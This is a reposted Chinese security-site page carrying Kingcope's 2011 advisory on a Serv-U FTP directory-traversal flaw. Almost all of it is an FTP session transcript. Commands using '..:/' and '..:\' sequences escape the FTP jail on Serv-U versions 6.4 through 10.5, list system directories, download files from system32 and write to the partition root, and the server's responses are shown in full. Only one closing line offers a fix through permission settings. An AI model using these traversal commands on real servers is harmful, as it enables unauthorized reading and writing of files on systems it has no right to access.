Serv-U FTP Jail Break(越权遍历目录、下载任意文件)
发布时间:2012-01-15 00:03:21 作者:佚名 
我要评论
我要评论Serv-U 越权遍历目录、下载任意文件,通过构造..:/来遍历服务器目录,下载任意文件
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
复制代码
代码如下:[*]----------------------------------------------------[*]
Serv-U FTP Server Jail Break 0day
Discovered By Kingcope
Year 2011
[*]----------------------------------------------------[*]
/*
sebug.net
通过构造..:/来遍历服务器目录,下载任意文件
影响版本:6.4,7.1,7.3,8.2,10.5
*/
Affected:
220 Serv-U FTP Server v7.3 ready...
220 Serv-U FTP Server v7.1 ready...
220 Serv-U FTP Server v6.4 ready...
220 Serv-U FTP Server v8.2 ready...
220 Serv-U FTP Server v10.5 ready...
[*]----------------------------------------------------[*]
C:\Users\kingcope\Desktop>ftp 192.168.133.134
Verbindung mit 192.168.133.134 wurde hergestellt.
220 Serv-U FTP Server v6.4 for WinSock ready...
Benutzer (192.168.133.134:(none)): ftp (anonymous user :>)
331 User name okay, please send complete E-mail address as password.
Kennwort:
230 User logged in, proceed.
ftp> cd "/..:/..:/..:/..:/program files"
250 Directory changed to /LocalUser/LocalUser/LocalUser/LocalUser/program files
ftp> ls -la
200 PORT Command successful.
150 Opening ASCII mode data connection for /bin/ls.
dr--r--r-- 1 user group 0 Nov 12 21:48 .
dr--r--r-- 1 user group 0 Nov 12 21:48 ..
drw-rw-rw- 1 user group 0 Feb 14 2011 Apache Software Foundatio
n
drw-rw-rw- 1 user group 0 Feb 5 2011 ComPlus Applications
drw-rw-rw- 1 user group 0 Jul 11 01:06 Common Files
drw-rw-rw- 1 user group 0 Jul 8 16:57 CoreFTPServer
drw-rw-rw- 1 user group 0 Jul 11 01:06 IIS Resources
d--------- 1 user group 0 Jul 8 16:12 InstallShield
Installation Information
drw-rw-rw- 1 user group 0 Jul 29 15:07 Internet Explorer
drw-rw-rw- 1 user group 0 Jul 8 16:12 Ipswitch
drw-rw-rw- 1 user group 0 Feb 12 2011 Java
drw-rw-rw- 1 user group 0 Jul 26 13:19 NetMeeting
drw-rw-rw- 1 user group 0 Jul 29 14:39 Outlook Express
drw-rw-rw- 1 user group 0 Jul 8 15:39 PostgreSQL
drw-rw-rw- 1 user group 0 Nov 12 21:48 RhinoSoft.com
drw-rw-rw- 1 user group 0 Feb 12 2011 Sun
d--------- 1 user group 0 Jul 29 15:13 Uninstall Information
drw-rw-rw- 1 user group 0 Feb 5 2011 VMware
drw-rw-rw- 1 user group 0 Jul 8 15:34 WinRAR
drw-rw-rw- 1 user group 0 Jul 26 13:30 Windows Media Player
drw-rw-rw- 1 user group 0 Feb 5 2011 Windows NT
d--------- 1 user group 0 Feb 5 2011 WindowsUpdate
226 Transfer complete.
FTP: 1795 Bytes empfangen in 0,00Sekunden 448,75KB/s
ftp>
[*]----------------------------------------------------[*]
with write perms:
ftp> put foo.txt ..:/..:/..:/foobar <<-- writes foo into root of partition
[*]----------------------------------------------------[*]
and as anonymous ftp:
ftp> get ..:/..:/..:/..:/windows/system32/calc.exe yes
200 PORT Command successful.
150 Opening ASCII mode data connection for calc.exe (115712 Bytes).
226 Transfer complete.
FTP: 115712 Bytes empfangen in 0,04Sekunden 2571,38KB/s
[*]----------------------------------------------------[*]
This works to!!! :
220 Serv-U FTP Server v7.3 ready...
Benutzer (xx.xx.xx.xx:(none)): ftp
331 User name okay, please send complete E-mail address as password.
Kennwort:
230 User logged in, proceed.
ftp> ls "-a ..:\:..\..:\..:\..:\..:\..:\..:\..:\*"
200 PORT Command successful.
150 Opening ASCII mode data connection for /bin/ls.
.
..
AUTOEXEC.BAT
boot.ini
bootfont.bin
bsmain_runtime.log
CONFIG.SYS
Documents and Settings
FPSE_search
Inetpub
IO.SYS
log
MSDOS.SYS
msizap.exe
MSOCache
mysql
NTDETECT.COM
ntldr
Program Files
RavBin
RECYCLER
Replay.log
rising.ini
System Volume Information
TDDOWNLOAD
WCH.CN
WINDOWS
wmpub
226 Transfer complete. 317 bytes transferred. 19.35 KB/sec.
FTP: 317 Bytes empfangen in 0,01Sekunden 21,13KB/s
[*]----------------------------------------------------[*]
Sometimes you need to give it the path:
ftp> ls "-a ..:\:..\..:\..:\..:\..:\..:\..:\..:\program files\"
ftp> ls "-a ..:\:..\..:\..:\..:\..:\..:\..:\..:\program files\*"
200 PORT Command successful.
150 Opening ASCII mode data connection for /bin/ls.
.
..
360
Adobe
ASP.NET
CCProxy
CE Remote Tools
cmak
Common Files
ComPlus Applications
D-Tools
FFTPServer
HTML Help Workshop
IISServer
InstallShield Installation Information
Intel
Internet Explorer
Java
JavaSoft
K-Lite Codec Pack
Microsoft ActiveSync
Microsoft Analysis Services
Microsoft Device Emulator
Microsoft MapPoint Web Service Samples
Microsoft MapPoint Web Service SDK, Version 4.0
Microsoft Office
Microsoft Office Servers
Microsoft Silverlight
Microsoft SQL Server
Microsoft Visual SourceSafe
Microsoft Visual Studio 8
Microsoft.NET
MSBuild
MSXML 6.0
NetMeeting
Outlook Express
PortMap1.61
Reference Assemblies
Rising
SQLXML 4.0
SQLyog Enterprise
STS2Setup_2052
Symantec
Thunder Network
TSingVision
Uninstall Information
Windows Media Player
Windows NT
WindowsUpdate
WinRAR
226 Transfer complete. 835 bytes transferred. 50.96 KB/sec.
FTP: 835 Bytes empfangen in 0,01Sekunden 64,23KB/s
ftp>
@Sebug.net [ 2011-12-01 ]
脚本提供修正方法:通过设置serv_u的权限可以防范此类问题,大家一定要注意serv_u安全设置问题。
相关文章
CC主要是用来攻击页面的,大家都有这样的经历,就是在访问论坛时,如果这个论坛比较大,访问的人比较多,打开页面的速度会比较慢,对不?!一般来说,访问的人越多,论坛的页2024-01-06
入侵者主要通过Potato程序攻击拥有SYSTEM权限的端口伪造网络身份认证过程,利用NTLM重放机制骗取SYSTEM身份令牌,最终取得系统权限,该安全风险微软并不认为存在漏洞,所以2021-04-15
这篇文章主要介绍了文件上传漏洞全面渗透分析小结,这里主要为大家分享一下防御方法,需要的朋友可以参考下2021-03-21- 这篇文章主要介绍了sql手工注入语句&SQL手工注入大全,需要的朋友可以参考下2017-09-06
- 这篇文章主要介绍了详解Filezilla server 提权,需要的朋友可以参考下2017-05-13
FileZilla Server 2008 x64 提权与防御方法
这篇文章主要介绍了FileZilla Server 2008 x64 提权与防御方法,需要的朋友可以参考下2017-05-13- 不久之前我们说过关于http和https的区别,对于加密的https,我们一直认为它是相对安全的,可今天要讲的是,一种绕过HTTPS加密得到明文信息的web攻击方式,不知道这消息对你2016-08-10
iPhone和Mac也会被黑 一条iMessage密码可能就被盗了
一直以来苹果系统的安全性都是比安卓要高的,但是再安全的系统也免不了漏洞,苹果也一样。最近爆出的新漏洞,只需要接收一条多媒体信息或者iMessage就会导致用户信息泄露。2016-07-27- 国家正在修正关于黑客方面的法律法规,有一条震惊黑客圈的“世纪佳缘”起诉白帽黑客事件,深深的伤害了广大黑客们的心,加上扎克伯格和特拉维斯·卡兰尼克账号被盗,于是黑2016-07-11
如何逆向破解HawkEye keylogger键盘记录器进入攻击者邮箱
面对恶意邮件攻击,我们就只能默默忍受被他攻击,连自我保护能力都没有谈什么反抗?让人痛快的是,如今有了解决办法,逆向破解键盘记录器,进入攻击者邮箱2016-07-06
最新评论